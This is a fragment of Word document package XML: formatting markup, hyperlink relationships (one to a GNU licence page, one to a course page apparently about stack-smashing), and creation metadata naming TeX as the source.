                    <w:spacing w:val="-1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532.018982pt;margin-top:35.278557pt;width:11pt;height:14.05pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-1624729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705" w:hanging="219"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="MS UI Gothic" w:hAnsi="MS UI Gothic" w:eastAsia="MS UI Gothic" w:cs="MS UI Gothic"/>
        <w:w w:val="24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8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8" w:hanging="2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90" w:hanging="431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7" w:hanging="53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8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7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6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5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4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3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2" w:hanging="53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0" w:hanging="43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97" w:hanging="53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2430" w:right="2707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7" w:hanging="53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5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gnu.org/licenses/fdl.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cs.wright.edu/people/faculty/tkprasad/courses/cs781/alephOne.html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2022-03-27T16:22:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-27T16:22:40Z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2014-10-08T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Creator">
    <vt:lpwstr>TeX</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="LastSaved">
    <vt:filetime>2022-03-27T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>